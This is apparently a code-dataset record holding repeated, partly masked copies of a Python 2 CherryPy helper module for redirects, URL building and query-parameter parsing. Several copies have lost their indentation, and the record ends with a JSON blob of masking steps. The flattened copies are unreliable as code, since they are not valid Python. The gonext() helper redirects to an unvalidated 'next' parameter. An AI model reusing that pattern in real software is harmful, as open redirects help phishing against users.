allowed_methods.append('HEAD')
allowed_methods.sort()
if cherrypy.request.method not in allowed_methods:
cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)
raise cherrypy.HTTPError(405)
def gonext():
"""Redirect to the url specified by the "next" parameter, if there is one.
"""
next = cherrypy.request.params.get('next', '')
if next != '':
redirect(next)
def url(*args, **kwargs):
"""Get the url for a given route.
"""
if len(args) == 0 and len(kwargs) == 0:
return cherrypy.url()
newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not
None and k.startswith('old'))
for k, v in kwargs.iteritems():
if k.startswith('new') or k.startswith('old'):
continue
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
for k, v in kwargs.iteritems():
if k[:3] != 'new':
continue
k = k[3:]
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
if len(args) > 0 and args[0] == 'static':
return config.STATIC_ASSETS_URL + '/'.join(args[1:])
return cherrypy.url(routes.url_for(*args, **newkwargs))
<|reserved_special_token_0|>
def get_or_404(cls, id):
try:
return cls.objects.get(unicode(id))
except KeyError:
raise cherrypy.NotFound
def locked(fn):
"""Decorator to ensure that the mutex is locked while calling a method.
The method's object must have a mutex in a property named "mutex".
"""
def locked_method(self, *args, **kwargs):
self.mutex.acquire()
try:
return fn(self, *args, **kwargs)
finally:
self.mutex.release()
return locked_method
def get_user():
from apps.store.models import User
try:
user = User.objects.get(u'_')
except KeyError:
user = User(None)
user.id = u'_'
User.objects.set(user)
return user
def get_settings():
from apps.store.models import Settings
try:
settings = Settings.objects.get(u'_')
except KeyError:
settings = Settings(None)
settings.id = u'_'
settings.set_roots(config.default_media_roots)
Settings.objects.set(settings)
return settings
<|reserved_special_token_0|>
def getparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single item, or None if not
supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return v[0]
return default
<|reserved_special_token_0|>
def getparamlist(name, default=[], stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
Returns a list of values.
"""
if params is None:
params = cherrypy.request.params
v = params.get('new' + name, None)
if v is None:
v = params.get(name, None)
if v is None:
v = params.get('old' + name, None)
if v is None:
return default
v = listify(v)
if stash is not None:
stash[str(name)] = v
return v
def getorderparam(name):
"""Get the sequence of numbers stored in a parameter.
The parameter should contain the numbers separated by commas.
If invalid entries are found, raises an HTTP 400 error.
"""
for num in cherrypy.request.params.get(name, '').split(','):
if num.strip() == '':
continue
try:
yield int(num)
except ValueError:
raise cherrypy.HTTPError(400)
def jsonresp(value):
"""Return a json formatted value, and set appropriate headers.
"""
body = json.dumps(value),
cherrypy.response.headers['Content-Type'] = 'application/json'
return body
def slugify(value):
import unicodedata
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\\w\\s\\.-]', '_', value).strip().lower())
return re.sub('[-\\s]+', '-', value)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def redirect(url, status=None):
"""Raise a redirect to the specified address.
"""
raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
allowed_methods = list(allowed_methods)
if 'GET' in allowed_methods:
if 'HEAD' not in allowed_methods:
allowed_methods.append('HEAD')
allowed_methods.sort()
if cherrypy.request.method not in allowed_methods:
cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)
raise cherrypy.HTTPError(405)
def gonext():
"""Redirect to the url specified by the "next" parameter, if there is one.
"""
next = cherrypy.request.params.get('next', '')
if next != '':
redirect(next)
def url(*args, **kwargs):
"""Get the url for a given route.
"""
if len(args) == 0 and len(kwargs) == 0:
return cherrypy.url()
newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not
None and k.startswith('old'))
for k, v in kwargs.iteritems():
if k.startswith('new') or k.startswith('old'):
continue
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
for k, v in kwargs.iteritems():
if k[:3] != 'new':
continue
k = k[3:]
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
if len(args) > 0 and args[0] == 'static':
return config.STATIC_ASSETS_URL + '/'.join(args[1:])
return cherrypy.url(routes.url_for(*args, **newkwargs))
<|reserved_special_token_0|>
def get_or_404(cls, id):
try:
return cls.objects.get(unicode(id))
except KeyError:
raise cherrypy.NotFound
def locked(fn):
"""Decorator to ensure that the mutex is locked while calling a method.
The method's object must have a mutex in a property named "mutex".
"""
def locked_method(self, *args, **kwargs):
self.mutex.acquire()
try:
return fn(self, *args, **kwargs)
finally:
self.mutex.release()
return locked_method
def get_user():
from apps.store.models import User
try:
user = User.objects.get(u'_')
except KeyError:
user = User(None)
user.id = u'_'
User.objects.set(user)
return user
def get_settings():
from apps.store.models import Settings
try:
settings = Settings.objects.get(u'_')
except KeyError:
settings = Settings(None)
settings.id = u'_'
settings.set_roots(config.default_media_roots)
Settings.objects.set(settings)
return settings
def listify(val):
"""Convert a value, as found in cherrypy parameters, into a list.
"""
if isinstance(val, basestring):
return [val]
if hasattr(val, '__iter__'):
return list(val)
return [val]
def listify_values(params):
"""Return a copy of a dict with values which were strings converted to
lists.
"""
return dict((k, listify(v)) for k, v in params.iteritems())
def getparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single item, or None if not
supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return v[0]
return default
def getintparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single integer item, or None if
not supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return int(v[0])
return default
def getparamlist(name, default=[], stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
Returns a list of values.
"""
if params is None:
params = cherrypy.request.params
v = params.get('new' + name, None)
if v is None:
v = params.get(name, None)
if v is None:
v = params.get('old' + name, None)
if v is None:
return default
v = listify(v)
if stash is not None:
stash[str(name)] = v
return v
def getorderparam(name):
"""Get the sequence of numbers stored in a parameter.
The parameter should contain the numbers separated by commas.
If invalid entries are found, raises an HTTP 400 error.
"""
for num in cherrypy.request.params.get(name, '').split(','):
if num.strip() == '':
continue
try:
yield int(num)
except ValueError:
raise cherrypy.HTTPError(400)
def jsonresp(value):
"""Return a json formatted value, and set appropriate headers.
"""
body = json.dumps(value),
cherrypy.response.headers['Content-Type'] = 'application/json'
return body
def slugify(value):
import unicodedata
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\\w\\s\\.-]', '_', value).strip().lower())
return re.sub('[-\\s]+', '-', value)
<|reserved_special_token_1|>
import cherrypy
import config
try:
from simplejson import json
except ImportError:
import json
import routes
import urllib
import re
def redirect(url, status=None):
"""Raise a redirect to the specified address.
"""
raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
allowed_methods = list(allowed_methods)
if 'GET' in allowed_methods:
if 'HEAD' not in allowed_methods:
allowed_methods.append('HEAD')
allowed_methods.sort()
if cherrypy.request.method not in allowed_methods:
cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)
raise cherrypy.HTTPError(405)
def gonext():
"""Redirect to the url specified by the "next" parameter, if there is one.
"""
next = cherrypy.request.params.get('next', '')
if next != '':
redirect(next)
def url(*args, **kwargs):
"""Get the url for a given route.
"""
if len(args) == 0 and len(kwargs) == 0:
return cherrypy.url()
newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not
None and k.startswith('old'))
for k, v in kwargs.iteritems():
if k.startswith('new') or k.startswith('old'):
continue
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
for k, v in kwargs.iteritems():
if k[:3] != 'new':
continue
k = k[3:]
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
if len(args) > 0 and args[0] == 'static':
return config.STATIC_ASSETS_URL + '/'.join(args[1:])
return cherrypy.url(routes.url_for(*args, **newkwargs))
def queryparams(*args, **kwargs):
"""Encode a set of arguments as query parameters.
"""
args = dict(args)
args.update(kwargs)
return urllib.urlencode(args)
def get_or_404(cls, id):
try:
return cls.objects.get(unicode(id))
except KeyError:
raise cherrypy.NotFound
def locked(fn):
"""Decorator to ensure that the mutex is locked while calling a method.
The method's object must have a mutex in a property named "mutex".
"""
def locked_method(self, *args, **kwargs):
self.mutex.acquire()
try:
return fn(self, *args, **kwargs)
finally:
self.mutex.release()
return locked_method
def get_user():
from apps.store.models import User
try:
user = User.objects.get(u'_')
except KeyError:
user = User(None)
user.id = u'_'
User.objects.set(user)
return user
def get_settings():
from apps.store.models import Settings
try:
settings = Settings.objects.get(u'_')
except KeyError:
settings = Settings(None)
settings.id = u'_'
settings.set_roots(config.default_media_roots)
Settings.objects.set(settings)
return settings
def listify(val):
"""Convert a value, as found in cherrypy parameters, into a list.
"""
if isinstance(val, basestring):
return [val]
if hasattr(val, '__iter__'):
return list(val)
return [val]
def listify_values(params):
"""Return a copy of a dict with values which were strings converted to
lists.
"""
return dict((k, listify(v)) for k, v in params.iteritems())
def getparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single item, or None if not
supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return v[0]
return default
def getintparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single integer item, or None if
not supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return int(v[0])
return default
def getparamlist(name, default=[], stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
Returns a list of values.
"""
if params is None:
params = cherrypy.request.params
v = params.get('new' + name, None)
if v is None:
v = params.get(name, None)
if v is None:
v = params.get('old' + name, None)
if v is None:
return default
v = listify(v)
if stash is not None:
stash[str(name)] = v
return v
def getorderparam(name):
"""Get the sequence of numbers stored in a parameter.
The parameter should contain the numbers separated by commas.
If invalid entries are found, raises an HTTP 400 error.
"""
for num in cherrypy.request.params.get(name, '').split(','):
if num.strip() == '':
continue
try:
yield int(num)
except ValueError:
raise cherrypy.HTTPError(400)
def jsonresp(value):
"""Return a json formatted value, and set appropriate headers.
"""
body = json.dumps(value),
cherrypy.response.headers['Content-Type'] = 'application/json'
return body
def slugify(value):
import unicodedata
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\\w\\s\\.-]', '_', value).strip().lower())
return re.sub('[-\\s]+', '-', value)
<|reserved_special_token_1|>
import cherrypy
import config
try:
from simplejson import json
except ImportError:
import json
import routes
import urllib
import re
def redirect(url, status=None):
    """Raise an HTTP redirect sending the client to *url*.

    :param status: optional redirect status code (e.g. 301); cherrypy's
        default is used when None.
    """
    raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
    """Reject the request with HTTP 405 unless its method is allowed.

    HEAD is implied whenever GET is allowed.  On rejection the ``Allow``
    response header is set to the sorted list of permitted methods.
    """
    methods = list(allowed_methods)
    if 'GET' in methods and 'HEAD' not in methods:
        methods.append('HEAD')
    methods.sort()
    if cherrypy.request.method not in methods:
        cherrypy.response.headers['Allow'] = ", ".join(methods)
        raise cherrypy.HTTPError(405)
def gonext():
    """Redirect to the url specified by the "next" parameter, if there is one.
    """
    target = cherrypy.request.params.get('next', '')
    if target != '':
        redirect(target)
def url(*args, **kwargs):
    """Get the url for a given route.

    Keyword arguments are merged into the route parameters with the
    following precedence (lowest to highest):

    - ``old<name>``: a previous value of ``<name>``; the ``old`` prefix
      is stripped and the remainder used as the parameter name.
    - ``<name>``: a plain value, overriding any ``old`` value.
    - ``new<name>``: an explicit replacement, overriding both.

    A value of ``None`` at any level removes the parameter.  The special
    first positional argument ``'static'`` builds a static-asset URL
    instead of a routed one.
    """
    if len(args) == 0 and len(kwargs) == 0:
        return cherrypy.url()
    # Seed with the "old" values, stripping the 'old' prefix from the
    # KEY.  (Previously this sliced the value instead -- ``(k, v[3:])``
    # -- which truncated the value and left the 'old' prefix on the key,
    # unlike the symmetric handling of 'new' keys below.)
    newkwargs = dict(
        (k[3:], v) for (k, v) in kwargs.iteritems()
        if v is not None and k.startswith('old')
    )
    # Apply plain args (neither new- nor old-prefixed); None deletes.
    for (k, v) in kwargs.iteritems():
        if k.startswith('new') or k.startswith('old'):
            continue
        if v is None:
            try:
                del newkwargs[k]
            except KeyError:
                pass
        else:
            newkwargs[k] = v
    # Apply "new" args last, so they override everything else.
    for (k, v) in kwargs.iteritems():
        if k[:3] != 'new':
            continue
        k = k[3:]
        if v is None:
            try:
                del newkwargs[k]
            except KeyError:
                pass
        else:
            newkwargs[k] = v
    if len(args) > 0 and args[0] == 'static':
        return config.STATIC_ASSETS_URL + '/'.join(args[1:])
    return cherrypy.url(routes.url_for(*args, **newkwargs))
def queryparams(*args, **kwargs):
    """Encode positional (key, value) pairs and keyword arguments as a
    URL query string.
    """
    merged = dict(args)
    merged.update(kwargs)
    return urllib.urlencode(merged)
def get_or_404(cls, id):
    """Return the *cls* instance with the given id, or raise HTTP 404."""
    key = unicode(id)
    try:
        return cls.objects.get(key)
    except KeyError:
        raise cherrypy.NotFound
def locked(fn):
    """Decorator to ensure that the mutex is locked while calling a method.

    The method's object must have a lock (anything exposing
    ``acquire``/``release``) in a property named "mutex".  The wrapper
    releases the lock even when *fn* raises.
    """
    import functools

    @functools.wraps(fn)  # preserve __name__/__doc__ of the wrapped method
    def locked_method(self, *args, **kwargs):
        self.mutex.acquire()
        try:
            return fn(self, *args, **kwargs)
        finally:
            self.mutex.release()
    return locked_method
def get_user():
    """Fetch the singleton User record, creating and storing it if absent."""
    from apps.store.models import User
    try:
        return User.objects.get(u'_')
    except KeyError:
        pass
    user = User(None)
    user.id = u'_'
    User.objects.set(user)
    return user
def get_settings():
    """Fetch the singleton Settings record, seeding defaults on first use."""
    from apps.store.models import Settings
    try:
        return Settings.objects.get(u'_')
    except KeyError:
        pass
    settings = Settings(None)
    settings.id = u'_'
    settings.set_roots(config.default_media_roots)
    Settings.objects.set(settings)
    return settings
def listify(val):
    """Convert a value, as found in cherrypy parameters, into a list.

    Strings stay whole (never split into characters); other iterables
    are copied into a list; scalars are wrapped in a one-element list.
    """
    if isinstance(val, basestring) or not hasattr(val, '__iter__'):
        return [val]
    return list(val)
def listify_values(params):
    """Return a copy of *params* with every value normalised to a list."""
    out = {}
    for (k, v) in params.iteritems():
        out[k] = listify(v)
    return out
def getparam(name, default=None, stash=None, params=None):
    """Get a query parameter, in a nice standardised way, with some special
    handling for old and new values.

    Returns a single item (an arbitrary one if the parameter was supplied
    several times), or *default* when it is absent.
    """
    values = getparamlist(name, stash=stash, params=params)
    return values[0] if values else default
def getintparam(name, default=None, stash=None, params=None):
    """Like ``getparam`` but coerces the found value to an ``int``.

    Returns *default* unchanged when the parameter is absent.
    """
    values = getparamlist(name, stash=stash, params=params)
    return int(values[0]) if values else default
def getparamlist(name, default=None, stash=None, params=None):
    """Get a query parameter, in a nice standardised way, with some special
    handling for old and new values.

    Looks up ``new<name>`` first, then ``<name>``, then ``old<name>``, so
    freshly submitted values win over the originals.

    :param name: base parameter name, without any prefix.
    :param default: value returned when no variant of the parameter is
        present.  ``None`` (the default) yields a fresh empty list, so
        callers may safely mutate the result.
    :param stash: optional dict; when given, the found values are stored
        under ``name``.
    :param params: parameter mapping to search; defaults to the current
        cherrypy request's params.

    Returns a list of values.
    """
    # A fresh list per call avoids the shared-mutable-default pitfall of
    # the previous ``default=[]`` signature, where one caller's mutation
    # of the returned default leaked into every later call.
    if default is None:
        default = []
    if params is None:
        params = cherrypy.request.params
    v = params.get("new" + name, None)
    if v is None:
        v = params.get(name, None)
    if v is None:
        v = params.get("old" + name, None)
    if v is None:
        return default
    v = listify(v)
    if stash is not None:
        stash[str(name)] = v
    return v
def getorderparam(name):
    """Yield the integers stored comma-separated in parameter *name*.

    Blank entries are skipped; a non-numeric entry aborts the request
    with HTTP 400.
    """
    raw = cherrypy.request.params.get(name, '')
    for piece in raw.split(','):
        if piece.strip() == '':
            continue
        try:
            yield int(piece)
        except ValueError:
            raise cherrypy.HTTPError(400)
def jsonresp(value):
    """Serialise *value* as JSON and mark the response as application/json.

    Returns a one-element tuple suitable for use as a cherrypy body.
    """
    payload = (json.dumps(value),)
    cherrypy.response.headers['Content-Type'] = 'application/json'
    return payload
def slugify(value):
    """Convert *value* into a url/filesystem-friendly slug.

    Accents are decomposed and dropped, disallowed characters become
    underscores, and runs of whitespace/hyphens collapse to one hyphen.
    """
    import unicodedata
    ascii_text = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
    cleaned = unicode(re.sub(r'[^\w\s\.-]', '_', ascii_text).strip().lower())
    return re.sub(r'[-\s]+', '-', cleaned)
|
flexible
|
{
"blob_id": "dc28d8aa17347f07041ae218bbe4e1b0add27c24",
"index": 5669,
"step-1": "<mask token>\n\n\ndef redirect(url, status=None):\n \"\"\"Raise a redirect to the specified address.\n\n \"\"\"\n raise cherrypy.HTTPRedirect(url, status)\n\n\ndef require_method(*allowed_methods):\n allowed_methods = list(allowed_methods)\n if 'GET' in allowed_methods:\n if 'HEAD' not in allowed_methods:\n allowed_methods.append('HEAD')\n allowed_methods.sort()\n if cherrypy.request.method not in allowed_methods:\n cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)\n raise cherrypy.HTTPError(405)\n\n\ndef gonext():\n \"\"\"Redirect to the url specified by the \"next\" parameter, if there is one.\n\n \"\"\"\n next = cherrypy.request.params.get('next', '')\n if next != '':\n redirect(next)\n\n\n<mask token>\n\n\ndef get_or_404(cls, id):\n try:\n return cls.objects.get(unicode(id))\n except KeyError:\n raise cherrypy.NotFound\n\n\ndef locked(fn):\n \"\"\"Decorator to ensure that the mutex is locked while calling a method.\n\n The method's object must have a mutex in a property named \"mutex\".\n\n \"\"\"\n\n def locked_method(self, *args, **kwargs):\n self.mutex.acquire()\n try:\n return fn(self, *args, **kwargs)\n finally:\n self.mutex.release()\n return locked_method\n\n\ndef get_user():\n from apps.store.models import User\n try:\n user = User.objects.get(u'_')\n except KeyError:\n user = User(None)\n user.id = u'_'\n User.objects.set(user)\n return user\n\n\ndef get_settings():\n from apps.store.models import Settings\n try:\n settings = Settings.objects.get(u'_')\n except KeyError:\n settings = Settings(None)\n settings.id = u'_'\n settings.set_roots(config.default_media_roots)\n Settings.objects.set(settings)\n return settings\n\n\n<mask token>\n\n\ndef getparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single item, or None if not\n supplied. 
If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return v[0]\n return default\n\n\n<mask token>\n\n\ndef getparamlist(name, default=[], stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n Returns a list of values.\n\n \"\"\"\n if params is None:\n params = cherrypy.request.params\n v = params.get('new' + name, None)\n if v is None:\n v = params.get(name, None)\n if v is None:\n v = params.get('old' + name, None)\n if v is None:\n return default\n v = listify(v)\n if stash is not None:\n stash[str(name)] = v\n return v\n\n\ndef getorderparam(name):\n \"\"\"Get the sequence of numbers stored in a parameter.\n\n The parameter should contain the numbers separated by commas.\n If invalid entries are found, raises an HTTP 400 error.\n\n \"\"\"\n for num in cherrypy.request.params.get(name, '').split(','):\n if num.strip() == '':\n continue\n try:\n yield int(num)\n except ValueError:\n raise cherrypy.HTTPError(400)\n\n\ndef jsonresp(value):\n \"\"\"Return a json formatted value, and set appropriate headers.\n\n \"\"\"\n body = json.dumps(value),\n cherrypy.response.headers['Content-Type'] = 'application/json'\n return body\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef redirect(url, status=None):\n \"\"\"Raise a redirect to the specified address.\n\n \"\"\"\n raise cherrypy.HTTPRedirect(url, status)\n\n\ndef require_method(*allowed_methods):\n allowed_methods = list(allowed_methods)\n if 'GET' in allowed_methods:\n if 'HEAD' not in allowed_methods:\n allowed_methods.append('HEAD')\n allowed_methods.sort()\n if cherrypy.request.method not in allowed_methods:\n cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)\n raise cherrypy.HTTPError(405)\n\n\ndef gonext():\n \"\"\"Redirect to the url specified by the \"next\" parameter, if there is one.\n\n \"\"\"\n next = cherrypy.request.params.get('next', '')\n if next != '':\n redirect(next)\n\n\ndef url(*args, **kwargs):\n \"\"\"Get the url for a given route.\n\n \"\"\"\n if len(args) == 0 and len(kwargs) == 0:\n return cherrypy.url()\n newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not\n None and k.startswith('old'))\n for k, v in kwargs.iteritems():\n if k.startswith('new') or k.startswith('old'):\n continue\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n for k, v in kwargs.iteritems():\n if k[:3] != 'new':\n continue\n k = k[3:]\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n if len(args) > 0 and args[0] == 'static':\n return config.STATIC_ASSETS_URL + '/'.join(args[1:])\n return cherrypy.url(routes.url_for(*args, **newkwargs))\n\n\n<mask token>\n\n\ndef get_or_404(cls, id):\n try:\n return cls.objects.get(unicode(id))\n except KeyError:\n raise cherrypy.NotFound\n\n\ndef locked(fn):\n \"\"\"Decorator to ensure that the mutex is locked while calling a method.\n\n The method's object must have a mutex in a property named \"mutex\".\n\n \"\"\"\n\n def locked_method(self, *args, **kwargs):\n self.mutex.acquire()\n try:\n return fn(self, *args, **kwargs)\n finally:\n self.mutex.release()\n return locked_method\n\n\ndef 
get_user():\n from apps.store.models import User\n try:\n user = User.objects.get(u'_')\n except KeyError:\n user = User(None)\n user.id = u'_'\n User.objects.set(user)\n return user\n\n\ndef get_settings():\n from apps.store.models import Settings\n try:\n settings = Settings.objects.get(u'_')\n except KeyError:\n settings = Settings(None)\n settings.id = u'_'\n settings.set_roots(config.default_media_roots)\n Settings.objects.set(settings)\n return settings\n\n\n<mask token>\n\n\ndef getparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single item, or None if not\n supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return v[0]\n return default\n\n\n<mask token>\n\n\ndef getparamlist(name, default=[], stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n Returns a list of values.\n\n \"\"\"\n if params is None:\n params = cherrypy.request.params\n v = params.get('new' + name, None)\n if v is None:\n v = params.get(name, None)\n if v is None:\n v = params.get('old' + name, None)\n if v is None:\n return default\n v = listify(v)\n if stash is not None:\n stash[str(name)] = v\n return v\n\n\ndef getorderparam(name):\n \"\"\"Get the sequence of numbers stored in a parameter.\n\n The parameter should contain the numbers separated by commas.\n If invalid entries are found, raises an HTTP 400 error.\n\n \"\"\"\n for num in cherrypy.request.params.get(name, '').split(','):\n if num.strip() == '':\n continue\n try:\n yield int(num)\n except ValueError:\n raise cherrypy.HTTPError(400)\n\n\ndef jsonresp(value):\n \"\"\"Return a json formatted value, and set appropriate headers.\n\n \"\"\"\n body = json.dumps(value),\n 
cherrypy.response.headers['Content-Type'] = 'application/json'\n return body\n\n\ndef slugify(value):\n import unicodedata\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\\\w\\\\s\\\\.-]', '_', value).strip().lower())\n return re.sub('[-\\\\s]+', '-', value)\n",
"step-3": "<mask token>\n\n\ndef redirect(url, status=None):\n \"\"\"Raise a redirect to the specified address.\n\n \"\"\"\n raise cherrypy.HTTPRedirect(url, status)\n\n\ndef require_method(*allowed_methods):\n allowed_methods = list(allowed_methods)\n if 'GET' in allowed_methods:\n if 'HEAD' not in allowed_methods:\n allowed_methods.append('HEAD')\n allowed_methods.sort()\n if cherrypy.request.method not in allowed_methods:\n cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)\n raise cherrypy.HTTPError(405)\n\n\ndef gonext():\n \"\"\"Redirect to the url specified by the \"next\" parameter, if there is one.\n\n \"\"\"\n next = cherrypy.request.params.get('next', '')\n if next != '':\n redirect(next)\n\n\ndef url(*args, **kwargs):\n \"\"\"Get the url for a given route.\n\n \"\"\"\n if len(args) == 0 and len(kwargs) == 0:\n return cherrypy.url()\n newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not\n None and k.startswith('old'))\n for k, v in kwargs.iteritems():\n if k.startswith('new') or k.startswith('old'):\n continue\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n for k, v in kwargs.iteritems():\n if k[:3] != 'new':\n continue\n k = k[3:]\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n if len(args) > 0 and args[0] == 'static':\n return config.STATIC_ASSETS_URL + '/'.join(args[1:])\n return cherrypy.url(routes.url_for(*args, **newkwargs))\n\n\n<mask token>\n\n\ndef get_or_404(cls, id):\n try:\n return cls.objects.get(unicode(id))\n except KeyError:\n raise cherrypy.NotFound\n\n\ndef locked(fn):\n \"\"\"Decorator to ensure that the mutex is locked while calling a method.\n\n The method's object must have a mutex in a property named \"mutex\".\n\n \"\"\"\n\n def locked_method(self, *args, **kwargs):\n self.mutex.acquire()\n try:\n return fn(self, *args, **kwargs)\n finally:\n self.mutex.release()\n return locked_method\n\n\ndef 
get_user():\n from apps.store.models import User\n try:\n user = User.objects.get(u'_')\n except KeyError:\n user = User(None)\n user.id = u'_'\n User.objects.set(user)\n return user\n\n\ndef get_settings():\n from apps.store.models import Settings\n try:\n settings = Settings.objects.get(u'_')\n except KeyError:\n settings = Settings(None)\n settings.id = u'_'\n settings.set_roots(config.default_media_roots)\n Settings.objects.set(settings)\n return settings\n\n\ndef listify(val):\n \"\"\"Convert a value, as found in cherrypy parameters, into a list.\n\n \"\"\"\n if isinstance(val, basestring):\n return [val]\n if hasattr(val, '__iter__'):\n return list(val)\n return [val]\n\n\ndef listify_values(params):\n \"\"\"Return a copy of a dict with values which were strings converted to\n lists.\n\n \"\"\"\n return dict((k, listify(v)) for k, v in params.iteritems())\n\n\ndef getparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single item, or None if not\n supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return v[0]\n return default\n\n\ndef getintparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single integer item, or None if\n not supplied. 
If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return int(v[0])\n return default\n\n\ndef getparamlist(name, default=[], stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n Returns a list of values.\n\n \"\"\"\n if params is None:\n params = cherrypy.request.params\n v = params.get('new' + name, None)\n if v is None:\n v = params.get(name, None)\n if v is None:\n v = params.get('old' + name, None)\n if v is None:\n return default\n v = listify(v)\n if stash is not None:\n stash[str(name)] = v\n return v\n\n\ndef getorderparam(name):\n \"\"\"Get the sequence of numbers stored in a parameter.\n\n The parameter should contain the numbers separated by commas.\n If invalid entries are found, raises an HTTP 400 error.\n\n \"\"\"\n for num in cherrypy.request.params.get(name, '').split(','):\n if num.strip() == '':\n continue\n try:\n yield int(num)\n except ValueError:\n raise cherrypy.HTTPError(400)\n\n\ndef jsonresp(value):\n \"\"\"Return a json formatted value, and set appropriate headers.\n\n \"\"\"\n body = json.dumps(value),\n cherrypy.response.headers['Content-Type'] = 'application/json'\n return body\n\n\ndef slugify(value):\n import unicodedata\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\\\w\\\\s\\\\.-]', '_', value).strip().lower())\n return re.sub('[-\\\\s]+', '-', value)\n",
"step-4": "import cherrypy\nimport config\ntry:\n from simplejson import json\nexcept ImportError:\n import json\nimport routes\nimport urllib\nimport re\n\n\ndef redirect(url, status=None):\n \"\"\"Raise a redirect to the specified address.\n\n \"\"\"\n raise cherrypy.HTTPRedirect(url, status)\n\n\ndef require_method(*allowed_methods):\n allowed_methods = list(allowed_methods)\n if 'GET' in allowed_methods:\n if 'HEAD' not in allowed_methods:\n allowed_methods.append('HEAD')\n allowed_methods.sort()\n if cherrypy.request.method not in allowed_methods:\n cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)\n raise cherrypy.HTTPError(405)\n\n\ndef gonext():\n \"\"\"Redirect to the url specified by the \"next\" parameter, if there is one.\n\n \"\"\"\n next = cherrypy.request.params.get('next', '')\n if next != '':\n redirect(next)\n\n\ndef url(*args, **kwargs):\n \"\"\"Get the url for a given route.\n\n \"\"\"\n if len(args) == 0 and len(kwargs) == 0:\n return cherrypy.url()\n newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not\n None and k.startswith('old'))\n for k, v in kwargs.iteritems():\n if k.startswith('new') or k.startswith('old'):\n continue\n if v is None:\n try:\n del 